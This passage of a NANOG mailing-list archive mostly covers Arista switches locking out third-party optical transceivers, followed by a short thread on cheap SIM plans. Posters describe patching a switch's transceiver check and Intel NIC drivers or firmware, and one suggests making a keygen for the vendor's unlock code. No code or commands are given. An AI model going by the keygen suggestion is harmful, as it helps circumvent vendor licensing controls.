non-Arista transceivers. Why > have you implemented it but don't provide an access key to your > customers when they ask for it? > If it is required to sign some papers which declare that I am aware of > all the risks and losing my warranty - I agree with that, lets do it. > Any way what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this > situation. If you have any other questions regarding enabling 3rd party > options in Arista switches, I suggest to contact your local account > team > (or sales) for further discussion on this matter. > > > Next, i've tried inserting various QSFP+ DAC cables I have - none of > them has been even detected on the switch, it was acting like nothing > has been inserted. I guess that even if I get the key, most of my > transceivers/DAC (which work like a champ in Juniper or Extreme > switches) cables wouldnt work. > > I'm writing this post to make somebody who considers buying their > switches be aware of what they'd get. Just buy Juniper instead. > > > Stanislaw wrote at 2016-08-17 23:25: >> Hi Tim, >> >> Thanks for your expressive answer. Will try it :) >> >> Tim Jackson ????? 2016-08-17 22:57: >> >>> I'd suggest bitching and moaning at your account team & support until >>> they give you the key to unlock them.. >>> >>> -- >>> Tim >>> >>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote: >>> >>>> Hi all, >>>> Is there a way for unlocking off-brand transceivers usage on Arista >>>> switches? >>>> >>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has >>>> been found out that Arista switches seem to not have possibility to >>>> unlock off-brand xcievers usage (by some service command or so). >>>> >>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the >>>> checking function bypass the actual check and it helped: ports are >>>> not in errdisable state anymore. But despite of xceivers are >>>> detected >>>> correctly, links aren't coming up (they are in notconnect state). >>>> >>>> If anyone possibly have does have a sacred knowledge of bringing >>>> off-branded transceivers to life on Arista switches, your help'd be >>>> very appreciated. Thanks. From hugge at nordu.net Thu Aug 18 11:47:09 2016 From: hugge at nordu.net (=?UTF-8?Q?Fredrik_Korsb=c3=a4ck?=) Date: Thu, 18 Aug 2016 13:47:09 +0200 Subject: Arista unqualified SFP In-Reply-To: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> Message-ID: <1374f97a-4549-9fa1-90e9-8b07562ee9ce@nordu.net> On 18/08/16 13:29, Dovid Bender wrote: > And I was about to jump on to the Arista train..... > > Regards, > > Dovid > > -----Original Message----- > From: Stanislaw > Sender: "NANOG" Date: Thu, 18 Aug 2016 13:24:05 > To: nanog list > Subject: Re: Arista unqualified SFP > > Hi all, > If somebody is following my epic adventure of getting uqualified SFP to > work on Aristas, here is the unhappy end of it. > > I've written to Arista support and got the following dialogue: > Support guy: > Hi, > Thank you for contacting Arista Support. My name is **** and I'll be > assisting you on this case. > Could you please provide the "show version" output from this switch? > > Me: > Hi, > Here it is: > > > Support guy: > Hi, > Thank you for the information. > Unfortunately, we are unable to activate your 3rd party components. To > ensure ongoing quality, Arista devices are designed to support only > properly qualified transceivers. > Please let me know if you have any other questions. > > Me: > I do not understand, > But there is a command which allows using non-Arista transceivers. Why > have you implemented it but don't provide an access key to your > customers when they ask for it? > If it is required to sign some papers which declare that I am aware of > all the risks and losing my warranty - I agree with that, lets do it. > Any way what are the conditions to receive that access key? > > Support guy: > I'm afraid that there is nothing I'm able to do regarding this > situation. If you have any other questions regarding enabling 3rd party > options in Arista switches, I suggest to contact your local account team > (or sales) for further discussion on this matter. > So. Since when does one handle a business-decisions with the TAC? handing out the key means that ANET will not never ever be able to sell you any optics, because that's how it works when you ride on the 3rd party optics train. Also the TAC need to be flagged to ignore non-official transcievers when sending in your issues so they know they don't have to bitch about that. Id suggest you call your SE/TAM instead of TAC for this. Or buy something where you can brand the EEPROM with something more appropriate that a ANET-switch like -- hugge From mark.tinka at seacom.mu Thu Aug 18 11:47:37 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 13:47:37 +0200 Subject: Arista unqualified SFP In-Reply-To: <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> Message-ID: <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> On 18/Aug/16 13:41, Youssef Bengelloun-Zahr wrote: > Hello all, > > At my actual job, some colleagues bought Arista switchs very recently. They asked the question about 3rd party transceivers and their SE told them exactly what has been said before : > > "we do accept 3rd party transceivers but we don't support them. If you still want to use them willingly, you'll have to sign a discharge paper and we'll provide you with a key to activate on your equipement". > > That's Arista's official policy regarding 3rd party transceivers. I am fine with that. All other vendors, explicitly or silently, adopt the same approach. Mark. From jackson.tim at gmail.com Thu Aug 18 12:05:30 2016 From: jackson.tim at gmail.com (Tim Jackson) Date: Thu, 18 Aug 2016 07:05:30 -0500 Subject: Arista unqualified SFP In-Reply-To: <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: > > Your AM team will gladly unlock this for you. > > This is probably just a procedural issue with Arista TAC not knowing the > secret sauce. That's not the answer I got at all from Arista: "I understand that Arista TAC indicated that could provide you with a transceiver unlock code. While it is true that the unlock code concept exists, it is very unusual for us to unlock optics on switches. We?d be happy to talk with you further about this in person. " Followup was: "As I'm sure you know, Arista is not the only manufacturer that has made this choice. Unlike our competition, we work to make our optics pricing competitive, but we'll never be as low as the "Taiwan specials" that you see floating around. I have another customer that was flashing white label optics that just made the decision to start using Arista labeled optics again because they were tired of bad quality." They basically said we'll sell you 10x priced optics instead of 100x and we're awesome because we do that. No unlock for you, buy our slightly cheaper OEM optics instead. -- Tim From mark.tinka at seacom.mu Thu Aug 18 12:18:47 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 14:18:47 +0200 Subject: Arista unqualified SFP In-Reply-To: <3f3e2f6d286b7c952fa5364664d0e822@nuclearcat.com> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <3f3e2f6d286b7c952fa5364664d0e822@nuclearcat.com> Message-ID: <46eb0437-b7a5-12f9-c357-8dde162e0f46@seacom.mu> On 18/Aug/16 13:47, Denys Fedoryshchenko wrote: > Same here, i was considering Arista, because they are quite cost > effective,feature rich, interesting hardware for developing some > custom solutions. But no more, after reading about unreasonable vendor > lock-in. > But such inflexibility are very bad sign, this "openness" looks like > marketing only, under the hood it seems worse than other solutions on > market. Also when support shows such inflexibility, it is very bad > sign. And very sad. Don't be too hasty. See my response earlier. Mark. From mark.tinka at seacom.mu Thu Aug 18 12:26:34 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 14:26:34 +0200 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: <8a0ea9d4-69fe-b3e4-2167-f1c95788ecd6@seacom.mu> On 18/Aug/16 14:05, Tim Jackson wrote: > That's not the answer I got at all from Arista: > > "I understand that Arista TAC indicated that could provide you > with a transceiver unlock code. While it is true that the unlock code > concept exists, it is very unusual for us to unlock optics on > switches. We?d be happy to talk with you further about this in person. " > > Followup was: > > "As I'm sure you know, Arista is not the only manufacturer that has > made this choice. Unlike our competition, we work to make our optics > pricing competitive, but we'll never be as low as the "Taiwan > specials" that you see floating around. I have another customer that > was flashing white label optics that just made the decision to start > using Arista labeled optics again because they were tired of bad quality." > > They basically said we'll sell you 10x priced optics instead of 100x > and we're awesome because we do that. No unlock for you, buy our > slightly cheaper OEM optics instead. So the bottom line is that not all AM's are built the same. Some are nice, some are not. Some are enthusiastic, some are docile. Some are self-motivated, some need a fire lit underneath them. My advice, tell them you'll take your business elsewhere if they don't come to the table. If that does not work, request for another AM. If that doesn't work, escalate to the sales head. If that doesn't work, look for another Arista sales office in some other region. If all that fails, move on to another vendor - although I doubt it will get to that point before someone within Arista is screamed at. Of course, there's always Twitter :-)... Mark. From youssef at 720.fr Thu Aug 18 12:31:29 2016 From: youssef at 720.fr (Youssef Bengelloun-Zahr) Date: Thu, 18 Aug 2016 14:31:29 +0200 Subject: Arista unqualified SFP In-Reply-To: <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: 2016-08-18 13:47 GMT+02:00 Mark Tinka : > > > On 18/Aug/16 13:41, Youssef Bengelloun-Zahr wrote: > > Hello all, > > At my actual job, some colleagues bought Arista switchs very recently. They asked the question about 3rd party transceivers and their SE told them exactly what has been said before : > > "we do accept 3rd party transceivers but we don't support them. If you still want to use them willingly, you'll have to sign a discharge paper and we'll provide you with a key to activate on your equipement". > > That's Arista's official policy regarding 3rd party transceivers. > > > I am fine with that. > > All other vendors, explicitly or silently, adopt the same approach. > > Mark. > +1. At least they have a policy that they fully assume publically, which is more than others can say/do. Best regards. -- Youssef BENGELLOUN-ZAHR From swmike at swm.pp.se Thu Aug 18 12:32:55 2016 From: swmike at swm.pp.se (Mikael Abrahamsson) Date: Thu, 18 Aug 2016 14:32:55 +0200 (CEST) Subject: Arista unqualified SFP In-Reply-To: <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. You run into very interesting problems when you're trying to use DAC cables between multi vendor. Any pointers to how to turn this of on Intel NICs and HP switches? -- Mikael Abrahamsson email: swmike at swm.pp.se From nanog at ics-il.net Thu Aug 18 12:41:47 2016 From: nanog at ics-il.net (Mike Hammett) Date: Thu, 18 Aug 2016 07:41:47 -0500 (CDT) Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> Intel does allow DAC of any vendor (assuming they properly identify as DACs. You can also disable Intel's check in the Linux drivers. ----- Mike Hammett Intelligent Computing Solutions Midwest Internet Exchange The Brothers WISP ----- Original Message ----- From: "Mikael Abrahamsson" To: "Mark Tinka" Cc: "nanog list" Sent: Thursday, August 18, 2016 7:32:55 AM Subject: Re: Arista unqualified SFP On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. You run into very interesting problems when you're trying to use DAC cables between multi vendor. Any pointers to how to turn this of on Intel NICs and HP switches? -- Mikael Abrahamsson email: swmike at swm.pp.se From nick at foobar.org Thu Aug 18 12:42:02 2016 From: nick at foobar.org (Nick Hilliard) Date: Thu, 18 Aug 2016 13:42:02 +0100 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> Message-ID: <57B5AD1A.90408@foobar.org> Tim Jackson wrote: > "As I'm sure you know, Arista is not the only manufacturer that has made > this choice. Unlike our competition, we work to make our optics pricing > competitive, but we'll never be as low as the "Taiwan specials" that you > see floating around. I have another customer that was flashing white label > optics that just made the decision to start using Arista labeled optics > again because they were tired of bad quality." > > They basically said we'll sell you 10x priced optics instead of 100x and > we're awesome because we do that. No unlock for you, buy our slightly > cheaper OEM optics instead. Nothing specific to Arista or anything, but this is a terribly frustrating position to be in as a customer, when you want to e.g. use some transceiver which isn't supported by the vendor or connect up Vendor A's switch to Vendor B's switch using a DAC or something. Ultimately one side needs to give in because vendor DACs are coded one way or the other. It is always better to clarify this sort of thing with the account management team before purchasing, and preferably have it in email or writing. After that, the best approach is to ask support and/or account management nicely rather than "bitching and moaning" as someone else suggested - diplomacy is usually a better long term basis for having a good relationship with your vendor. Often it's useful to point out discussions like this which indicate that it's been enabled for other people. Nick From mark.tinka at seacom.mu Thu Aug 18 12:45:31 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 18 Aug 2016 14:45:31 +0200 Subject: Arista unqualified SFP In-Reply-To: <57B5AD1A.90408@foobar.org> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> Message-ID: On 18/Aug/16 14:42, Nick Hilliard wrote: > > It is always better to clarify this sort of thing with the account > management team before purchasing, and preferably have it in email or > writing. After that, the best approach is to ask support and/or account > management nicely rather than "bitching and moaning" as someone else > suggested - diplomacy is usually a better long term basis for having a > good relationship with your vendor. Often it's useful to point out > discussions like this which indicate that it's been enabled for other > people. +1. We politely said to Arista, "We like your box, but we're afraid that if we can't use our existing optics, we'd all miss out on a good opportunity working together". That did the job. Mark. From nick at foobar.org Thu Aug 18 12:46:28 2016 From: nick at foobar.org (Nick Hilliard) Date: Thu, 18 Aug 2016 13:46:28 +0100 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: <57B5AE24.6030404@foobar.org> Mikael Abrahamsson wrote: > Any pointers to how to turn this of on Intel NICs and HP switches? Yes: don't buy Intel NICs or HP switches. Problem solved. Nick From denys at visp.net.lb Thu Aug 18 12:51:13 2016 From: denys at visp.net.lb (Denys Fedoryshchenko) Date: Thu, 18 Aug 2016 15:51:13 +0300 Subject: Arista unqualified SFP In-Reply-To: <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> Message-ID: Not a case with Intel X*710 new chipset, check is in firmware. Someone hacked it, but ... On 2016-08-18 15:41, Mike Hammett wrote: > Intel does allow DAC of any vendor (assuming they properly identify as > DACs. You can also disable Intel's check in the Linux drivers. > > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > ----- Original Message ----- > > From: "Mikael Abrahamsson" > To: "Mark Tinka" > Cc: "nanog list" > Sent: Thursday, August 18, 2016 7:32:55 AM > Subject: Re: Arista unqualified SFP > > On Thu, 18 Aug 2016, Mark Tinka wrote: > >> All other vendors, explicitly or silently, adopt the same approach. > > I've heard from people running Intel NICs and HP switches, that this > can't > be turned off there. You run into very interesting problems when you're > trying to use DAC cables between multi vendor. > > Any pointers to how to turn this of on Intel NICs and HP switches? From nanog at ics-il.net Thu Aug 18 12:55:23 2016 From: nanog at ics-il.net (Mike Hammett) Date: Thu, 18 Aug 2016 07:55:23 -0500 (CDT) Subject: Arista unqualified SFP In-Reply-To: References: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> Message-ID: <1335340996.4585.1471524919146.JavaMail.mhammett@ThunderFuck> https://sourceforge.net/p/e1000/mailman/message/28698959/ That or similar doesn't work for that model? ----- Mike Hammett Intelligent Computing Solutions Midwest Internet Exchange The Brothers WISP ----- Original Message ----- From: "Denys Fedoryshchenko" To: "Mike Hammett" Cc: "NANOG Mailing List" Sent: Thursday, August 18, 2016 7:51:13 AM Subject: Re: Arista unqualified SFP Not a case with Intel X*710 new chipset, check is in firmware. Someone hacked it, but ... On 2016-08-18 15:41, Mike Hammett wrote: > Intel does allow DAC of any vendor (assuming they properly identify as > DACs. You can also disable Intel's check in the Linux drivers. > > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > ----- Original Message ----- > > From: "Mikael Abrahamsson" > To: "Mark Tinka" > Cc: "nanog list" > Sent: Thursday, August 18, 2016 7:32:55 AM > Subject: Re: Arista unqualified SFP > > On Thu, 18 Aug 2016, Mark Tinka wrote: > >> All other vendors, explicitly or silently, adopt the same approach. > > I've heard from people running Intel NICs and HP switches, that this > can't > be turned off there. You run into very interesting problems when you're > trying to use DAC cables between multi vendor. > > Any pointers to how to turn this of on Intel NICs and HP switches? From hugge at nordu.net Thu Aug 18 13:01:57 2016 From: hugge at nordu.net (=?UTF-8?Q?Fredrik_Korsb=c3=a4ck?=) Date: Thu, 18 Aug 2016 15:01:57 +0200 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> Message-ID: <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> On 18/08/16 14:45, Mark Tinka wrote: > > > On 18/Aug/16 14:42, Nick Hilliard wrote: > >> >> It is always better to clarify this sort of thing with the account >> management team before purchasing, and preferably have it in email or >> writing. After that, the best approach is to ask support and/or account >> management nicely rather than "bitching and moaning" as someone else >> suggested - diplomacy is usually a better long term basis for having a >> good relationship with your vendor. Often it's useful to point out >> discussions like this which indicate that it's been enabled for other >> people. > > +1. > > We politely said to Arista, "We like your box, but we're afraid that if > we can't use our existing optics, we'd all miss out on a good > opportunity working together". > > That did the job. > > Mark. > I think someone from Arista said... "We are never going to lose an affair due to not supporting 3-d party optics, but we will try to convince the customer to buy our stuff, since that's what we do, we sell stuff". In these cheap arista switches, filling them with optics (if the optics is from ANET themselves) is usually the same cost as buying like five switches, so of course they want a share of that and they will try to convince you that 3rd party optics will make the switch go up in flames etc etc. So its kinda easy... just present three choices. 1. Arista Switch + Arista Optics (at the same price as your favourite 3rd party vendor) 2. Arista Switch + 3rd party optics 3. No Arista switch. I know which one you are gonna get. -- hugge From denys at visp.net.lb Thu Aug 18 13:19:14 2016 From: denys at visp.net.lb (Denys Fedoryshchenko) Date: Thu, 18 Aug 2016 16:19:14 +0300 Subject: Arista unqualified SFP In-Reply-To: <1335340996.4585.1471524919146.JavaMail.mhammett@ThunderFuck> References: <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> <533173717.4540.1471524103872.JavaMail.mhammett@ThunderFuck> <1335340996.4585.1471524919146.JavaMail.mhammett@ThunderFuck> Message-ID: <753efaac4d182cdbab872068956e3083@nuclearcat.com> No, this driver patch (or similar) wont work on new model. But honestly, on my experience, X520 perform still better than 710 series on 10G links. https://sourceforge.net/p/e1000/mailman/message/34991760/ From: Wesley W. Terpstra - 2016-04-03 14:03:52 He did unlocked by modifying NVM in card(and i guess losing warranty, for sure) Somehow it is even better, because X520 needed modification of driver, and that is not possible on "blackbox" software solutions using them. On 2016-08-18 15:55, Mike Hammett wrote: > https://sourceforge.net/p/e1000/mailman/message/28698959/ > > That or similar doesn't work for that model? > > > > > ----- > Mike Hammett > Intelligent Computing Solutions > > Midwest Internet Exchange > > The Brothers WISP > > ----- Original Message ----- > > From: "Denys Fedoryshchenko" > To: "Mike Hammett" > Cc: "NANOG Mailing List" > Sent: Thursday, August 18, 2016 7:51:13 AM > Subject: Re: Arista unqualified SFP > > Not a case with Intel X*710 new chipset, check is in firmware. > Someone hacked it, but ... > > On 2016-08-18 15:41, Mike Hammett wrote: >> Intel does allow DAC of any vendor (assuming they properly identify as >> DACs. You can also disable Intel's check in the Linux drivers. >> >> >> >> >> ----- >> Mike Hammett >> Intelligent Computing Solutions >> >> Midwest Internet Exchange >> >> The Brothers WISP >> >> ----- Original Message ----- >> >> From: "Mikael Abrahamsson" >> To: "Mark Tinka" >> Cc: "nanog list" >> Sent: Thursday, August 18, 2016 7:32:55 AM >> Subject: Re: Arista unqualified SFP >> >> On Thu, 18 Aug 2016, Mark Tinka wrote: >> >>> All other vendors, explicitly or silently, adopt the same approach. >> >> I've heard from people running Intel NICs and HP switches, that this >> can't >> be turned off there. You run into very interesting problems when >> you're >> trying to use DAC cables between multi vendor. >> >> Any pointers to how to turn this of on Intel NICs and HP switches? From ryan.dirocco at totalserversolutions.com Thu Aug 18 13:49:14 2016 From: ryan.dirocco at totalserversolutions.com (Ryan DiRocco) Date: Thu, 18 Aug 2016 13:49:14 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> Message-ID: If you are running Intel NIC(s) such as the X520-DA2 with 3rd party optics for something like DWDM, there are driver option flags for linux/windows, etc to permit the use of the optics. In deployments we've used various branded dac cables to connect Intel branded nics to cisco/arista/brocade, without issue. As with any vendor, there is a work around procedure. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mikael Abrahamsson Sent: Thursday, August 18, 2016 8:33 AM To: Mark Tinka Cc: nanog list Subject: Re: Arista unqualified SFP On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. You run into very interesting problems when you're trying to use DAC cables between multi vendor. Any pointers to how to turn this of on Intel NICs and HP switches? -- Mikael Abrahamsson email: swmike at swm.pp.se From sryan at arbor.net Thu Aug 18 13:50:34 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Thu, 18 Aug 2016 13:50:34 +0000 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <4705B9D1-6A5A-46E5-9B42-53CCD93A456D@720.fr> <5d656455-8aeb-5ca3-1bd5-bd094b017c79@seacom.mu> , Message-ID: All of our X520's don't care if you use Arista or Proline DAC cables (the two brands we have around). Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Ryan DiRocco Sent: Thursday, August 18, 2016 9:49:14 AM To: Mikael Abrahamsson; Mark Tinka Cc: nanog list Subject: RE: Arista unqualified SFP If you are running Intel NIC(s) such as the X520-DA2 with 3rd party optics for something like DWDM, there are driver option flags for linux/windows, etc to permit the use of the optics. In deployments we've used various branded dac cables to connect Intel branded nics to cisco/arista/brocade, without issue. As with any vendor, there is a work around procedure. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mikael Abrahamsson Sent: Thursday, August 18, 2016 8:33 AM To: Mark Tinka Cc: nanog list Subject: Re: Arista unqualified SFP On Thu, 18 Aug 2016, Mark Tinka wrote: > All other vendors, explicitly or silently, adopt the same approach. I've heard from people running Intel NICs and HP switches, that this can't be turned off there. You run into very interesting problems when you're trying to use DAC cables between multi vendor. Any pointers to how to turn this of on Intel NICs and HP switches? -- Mikael Abrahamsson email: swmike at swm.pp.se From telmnstr at 757.org Thu Aug 18 13:59:55 2016 From: telmnstr at 757.org (Ethan) Date: Thu, 18 Aug 2016 09:59:55 -0400 (EDT) Subject: Arista unqualified SFP In-Reply-To: <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> Message-ID: > I think someone from Arista said... > "We are never going to lose an affair due to not supporting 3-d party optics, but we will try to convince the customer to buy our stuff, since that's what we do, we sell stuff". > In these cheap arista switches, filling them with optics (if the optics is from ANET themselves) is usually the same cost as buying like five switches, so of course they want a share of that and they will try to convince you that 3rd party optics will make the switch go up in flames etc etc. > So its kinda easy... just present three choices. Arista is an x86 Fedora box right? Get someone to make a keygen. From me at nek0.net Thu Aug 18 14:38:30 2016 From: me at nek0.net (Stanislaw) Date: Thu, 18 Aug 2016 17:38:30 +0300 Subject: Arista unqualified SFP In-Reply-To: References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org> <7f8d72f2-fd9e-d04d-42c3-a20e12f04241@nordu.net> Message-ID: Yeah, it is. And yeah, I was considering that option too. Ethan ????? 2016-08-18 16:59: >> I think someone from Arista said... >> "We are never going to lose an affair due to not supporting 3-d party >> optics, but we will try to convince the customer to buy our stuff, >> since that's what we do, we sell stuff". >> In these cheap arista switches, filling them with optics (if the >> optics is from ANET themselves) is usually the same cost as buying >> like five switches, so of course they want a share of that and they >> will try to convince you that 3rd party optics will make the switch go >> up in flames etc etc. >> So its kinda easy... just present three choices. > > Arista is an x86 Fedora box right? > > Get someone to make a keygen. From johnl at iecc.com Thu Aug 18 17:51:35 2016 From: johnl at iecc.com (John Levine) Date: 18 Aug 2016 17:51:35 -0000 Subject: cheap SMS, was Email to text - In-Reply-To: Message-ID: <20160818175135.16264.qmail@ary.lan> >Then I went into a t-mobile store and bought a few $25/mo SIM cards, put credit card on file to auto renew each month, slapped them in, and pointed our NMS?s at them. Since this comes up from time to time, here's the cheapest US SIM plans I know of. Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the cheapest plan is $18 for 90 days if you sign up and autorenew. That gives you 180 SMS. and if you want them 180 mins of voice and 180MB of data, unused rolls over. Customer service is OK, seems to be in the US, aimed at a bilingual Spanish/English market. Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500 SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice. They have very good US-based customer service. R's, John From eric.kuhnke at gmail.com Thu Aug 18 17:59:02 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Thu, 18 Aug 2016 10:59:02 -0700 Subject: cheap SMS, was Email to text - In-Reply-To: <20160818175135.16264.qmail@ary.lan> References: <20160818175135.16264.qmail@ary.lan> Message-ID: The "Ting" MVNO is owned/run by the Tucows people (remember them!) and runs on either Sprint or T-Mobile's network depending on where you are. For very low data rate OOB access type things it can be as low as $10/mo for an active LTE SIM card. https://ting.com/rates?ab=1 On Thu, Aug 18, 2016 at 10:51 AM, John Levine wrote: > >Then I went into a t-mobile store and bought a few $25/mo SIM cards, put > credit card on file to auto renew each month, slapped them in, and pointed > our NMS?s at them. > > Since this comes up from time to time, here's the cheapest US SIM plans I > know of. > > Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the > cheapest plan is $18 for 90 days if you sign up and autorenew. That > gives you 180 SMS. and if you want them 180 mins of voice and 180MB of > data, unused rolls over. Customer service is OK, seems to be in the > US, aimed at a bilingual Spanish/English market. > > Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500 > SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice. > They have very good US-based customer service. > > R's, > John > From eric.kuhnke at gmail.com Thu Aug 18 20:49:21 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Thu, 18 Aug 2016 13:49:21 -0700 Subject: cheap SMS, was Email to text - In-Reply-To: References: <20160818175135.16264.qmail@ary.lan> Message-ID: There isn't, really, the closest you can get (on a GSM-derived, LTE network) is probably a pay-as-you-go data plan per GB on one of Rogers' sub-brands Fido or Chatr. On Thu, Aug 18, 2016 at 11:49 AM, Sean Watkins wrote: > Tings pricing looks really good. > > > Anyone know of an equiv in Canada? > > Sean > > > On Thu, Aug 18, 2016 at 11:59 AM, 